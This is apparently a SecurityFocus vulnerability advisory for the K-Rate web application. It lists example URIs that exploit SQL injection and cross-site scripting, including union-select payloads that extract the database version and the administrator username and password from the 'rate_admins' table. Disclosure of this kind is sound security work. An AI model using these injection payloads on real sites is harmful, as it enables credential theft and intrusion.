K-Rate Multiple Input Validation Vulnerabilities

An attacker can exploit these issues via a browser. To exploit a cross-site scripting vulnerability, the attacker must entice a victim user to follow a malicious URI.

The following example URIs are available:

http://www.example.com/index.php?req=online&show=1[SQL]
http://www.example.com/room/1[SQL]
http://www.example.com/index.php?req=view&user=somegirl&id=2[SQL]&act=vote&image=3&voter=12 vote=3
http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3[SQL]&voter=12&vote=3
http://www.example.com/blog/somegirl[SQL]
http://www.example.com/index.php?req=blog_edit&id=1[SQL]
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,version(),4,5,6/*
http://www.example.com/room/-1 union select 1,version(),3,4/*
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_user,4,5,6 from rate_admins where adm_id=1/*
http://www.example.com/index.php?req=blog_edit&id=-1 union select 1,2,adm_pass,4,5,6 from rate_admins where adm_id=1/*
http://www.example.com/index.php?req=view&user=somegirl&id=2&act=vote&image=3&voter=12&vote=3[XSS]


 

Privacy Statement
Copyright 2010, SecurityFocus